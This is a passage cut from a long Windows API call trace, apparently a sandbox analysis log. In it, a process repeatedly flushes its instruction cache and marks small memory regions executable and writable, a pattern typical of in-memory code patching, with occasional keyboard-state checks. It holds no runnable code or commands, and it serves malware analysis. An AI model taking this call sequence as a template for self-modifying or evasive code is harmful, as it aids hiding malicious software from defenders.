0xffffffff [0114.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0114.434] GetCurrentProcess () returned 0xffffffff [0114.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0114.434] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.434] GetCurrentProcess () returned 0xffffffff [0114.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0114.434] GetCurrentProcess () returned 0xffffffff [0114.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0114.434] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.435] GetCurrentProcess () returned 0xffffffff [0114.435] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0114.436] GetAsyncKeyState (vKey=3) returned 0 [0114.436] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.436] CRetailMalloc_Alloc () returned 0xcb0faf8 [0114.436] memcpy (in: _Dst=0xb754f48, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.436] memcpy (in: _Dst=0xcb0fb18, _Src=0x197724, _Size=0x18 | out: _Dst=0xcb0fb18) returned 0xcb0fb18 [0114.436] CRetailMalloc_Realloc () returned 0xcb0faf8 [0114.436] CRetailMalloc_Free () returned 0x1 [0114.436] GetCurrentProcess () returned 0xffffffff [0114.436] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0114.436] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.437] GetCurrentProcess () returned 0xffffffff [0114.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0114.437] GetCurrentProcess () returned 0xffffffff [0114.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0114.437] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.438] GetCurrentProcess () returned 0xffffffff [0114.438] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0114.438] GetCurrentProcess () returned 0xffffffff [0114.438] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0114.438] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.438] GetCurrentProcess () returned 0xffffffff [0114.438] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0114.438] GetCurrentProcess () returned 0xffffffff [0114.439] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0114.439] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.439] GetCurrentProcess () returned 0xffffffff [0114.439] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0114.439] GetCurrentProcess () returned 0xffffffff [0114.439] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0114.439] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.440] GetCurrentProcess () returned 0xffffffff [0114.440] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0114.440] GetCurrentProcess () returned 0xffffffff [0114.440] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0114.440] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.441] GetCurrentProcess () returned 0xffffffff [0114.441] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0114.441] GetCurrentProcess () returned 0xffffffff [0114.441] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0114.441] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.442] GetCurrentProcess () returned 0xffffffff [0114.442] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0114.442] GetCurrentProcess () returned 0xffffffff [0114.442] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0114.442] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.442] GetCurrentProcess () returned 0xffffffff [0114.442] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0114.442] GetCurrentProcess () returned 0xffffffff [0114.442] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0114.442] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.443] GetCurrentProcess () returned 0xffffffff [0114.443] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0114.443] GetCurrentProcess () returned 0xffffffff [0114.443] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0114.443] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.444] GetCurrentProcess () returned 0xffffffff [0114.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0114.444] GetCurrentProcess () returned 0xffffffff [0114.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0114.444] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.444] GetCurrentProcess () returned 0xffffffff [0114.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0114.444] GetCurrentProcess () returned 0xffffffff [0114.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0114.444] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.445] GetCurrentProcess () returned 0xffffffff [0114.445] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0114.445] GetCurrentProcess () returned 0xffffffff [0114.445] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0114.445] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.446] GetCurrentProcess () returned 0xffffffff [0114.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0114.446] GetCurrentProcess () returned 0xffffffff [0114.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0114.446] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.447] GetCurrentProcess () returned 0xffffffff [0114.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0114.447] GetCurrentProcess () returned 0xffffffff [0114.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0114.447] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.447] GetCurrentProcess () returned 0xffffffff [0114.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0114.447] GetCurrentProcess () returned 0xffffffff [0114.447] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0114.448] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.448] GetCurrentProcess () returned 0xffffffff [0114.448] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0114.448] GetCurrentProcess () returned 0xffffffff [0114.448] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0114.448] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.449] GetCurrentProcess () returned 0xffffffff [0114.449] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0114.449] GetCurrentProcess () returned 0xffffffff [0114.449] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0114.449] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.450] GetCurrentProcess () returned 0xffffffff [0114.450] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0114.450] GetCurrentProcess () returned 0xffffffff [0114.450] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0114.450] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.450] GetCurrentProcess () returned 0xffffffff [0114.450] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0114.450] GetCurrentProcess () returned 0xffffffff [0114.450] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0114.451] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.451] GetCurrentProcess () returned 0xffffffff [0114.451] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0114.451] GetCurrentProcess () returned 0xffffffff [0114.451] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0114.451] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.452] GetCurrentProcess () returned 0xffffffff [0114.452] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0114.452] GetCurrentProcess () returned 0xffffffff [0114.452] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0114.452] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.453] GetCurrentProcess () returned 0xffffffff [0114.453] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0114.453] GetCurrentProcess () returned 0xffffffff [0114.453] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0114.453] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.453] GetCurrentProcess () returned 0xffffffff [0114.453] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0114.453] GetCurrentProcess () returned 0xffffffff [0114.453] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0114.454] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.454] GetCurrentProcess () returned 0xffffffff [0114.454] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0114.454] GetCurrentProcess () returned 0xffffffff [0114.454] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0114.454] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.455] GetCurrentProcess () returned 0xffffffff [0114.455] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0114.455] GetCurrentProcess () returned 0xffffffff [0114.455] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0114.455] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.455] GetCurrentProcess () returned 0xffffffff [0114.456] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0114.456] GetCurrentProcess () returned 0xffffffff [0114.456] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0114.456] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.457] GetCurrentProcess () returned 0xffffffff [0114.457] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0114.457] GetCurrentProcess () returned 0xffffffff [0114.457] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0114.457] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.458] GetCurrentProcess () returned 0xffffffff [0114.458] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0114.458] GetCurrentProcess () returned 0xffffffff [0114.458] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0114.458] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.458] GetCurrentProcess () returned 0xffffffff [0114.458] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0114.458] GetCurrentProcess () returned 0xffffffff [0114.458] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0114.458] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.459] GetCurrentProcess () returned 0xffffffff [0114.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0114.459] GetCurrentProcess () returned 0xffffffff [0114.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0114.459] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.460] GetCurrentProcess () returned 0xffffffff [0114.460] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0114.461] GetAsyncKeyState (vKey=3) returned 0 [0114.461] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.461] CRetailMalloc_Alloc () returned 0xcaa3688 [0114.461] memcpy (in: _Dst=0xb754f48, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.461] memcpy (in: _Dst=0xcaa36a8, _Src=0x197724, _Size=0x18 | out: _Dst=0xcaa36a8) returned 0xcaa36a8 [0114.461] CRetailMalloc_Realloc () returned 0xcaa3688 [0114.461] CRetailMalloc_Free () returned 0x1 [0114.461] GetCurrentProcess () returned 0xffffffff [0114.461] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0114.461] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.462] GetCurrentProcess () returned 0xffffffff [0114.462] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0114.462] GetCurrentProcess () returned 0xffffffff [0114.462] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0114.462] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.463] GetCurrentProcess () returned 0xffffffff [0114.463] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0114.463] GetCurrentProcess () returned 0xffffffff [0114.463] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0114.463] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.463] GetCurrentProcess () returned 0xffffffff [0114.463] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0114.463] GetCurrentProcess () returned 0xffffffff [0114.463] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0114.464] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.464] GetCurrentProcess () returned 0xffffffff [0114.464] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0114.464] GetCurrentProcess () returned 0xffffffff [0114.464] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0114.464] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.465] GetCurrentProcess () returned 0xffffffff [0114.465] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0114.465] GetCurrentProcess () returned 0xffffffff [0114.465] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0114.465] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.466] GetCurrentProcess () returned 0xffffffff [0114.466] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0114.466] GetCurrentProcess () returned 0xffffffff [0114.466] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0114.466] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.466] GetCurrentProcess () returned 0xffffffff [0114.466] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0114.466] GetCurrentProcess () returned 0xffffffff [0114.466] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0114.466] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.467] GetCurrentProcess () returned 0xffffffff [0114.467] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0114.467] GetCurrentProcess () returned 0xffffffff [0114.467] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0114.467] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.468] GetCurrentProcess () returned 0xffffffff [0114.468] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0114.468] GetCurrentProcess () returned 0xffffffff [0114.468] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0114.468] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.469] GetCurrentProcess () returned 0xffffffff [0114.469] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0114.469] GetCurrentProcess () returned 0xffffffff [0114.469] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0114.469] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.469] GetCurrentProcess () returned 0xffffffff [0114.469] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0114.469] GetCurrentProcess () returned 0xffffffff [0114.469] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0114.469] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.470] GetCurrentProcess () returned 0xffffffff [0114.470] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0114.470] GetCurrentProcess () returned 0xffffffff [0114.470] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0114.470] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.471] GetCurrentProcess () returned 0xffffffff [0114.471] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0114.471] GetCurrentProcess () returned 0xffffffff [0114.471] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0114.471] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.523] GetCurrentProcess () returned 0xffffffff [0114.523] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0114.523] GetCurrentProcess () returned 0xffffffff [0114.523] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0114.523] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.524] GetCurrentProcess () returned 0xffffffff [0114.524] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0114.524] GetCurrentProcess () returned 0xffffffff [0114.524] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0114.524] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.525] GetCurrentProcess () returned 0xffffffff [0114.525] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0114.525] GetCurrentProcess () returned 0xffffffff [0114.525] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0114.525] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.525] GetCurrentProcess () returned 0xffffffff [0114.525] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0114.525] GetCurrentProcess () returned 0xffffffff [0114.525] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0114.525] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.526] GetCurrentProcess () returned 0xffffffff [0114.526] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0114.526] GetCurrentProcess () returned 0xffffffff [0114.526] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0114.526] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.527] GetCurrentProcess () returned 0xffffffff [0114.527] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0114.527] GetCurrentProcess () returned 0xffffffff [0114.527] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0114.527] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.527] GetCurrentProcess () returned 0xffffffff [0114.527] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0114.527] GetCurrentProcess () returned 0xffffffff [0114.527] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0114.527] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.528] GetCurrentProcess () returned 0xffffffff [0114.528] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0114.528] GetCurrentProcess () returned 0xffffffff [0114.528] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0114.528] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.529] GetCurrentProcess () returned 0xffffffff [0114.529] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, 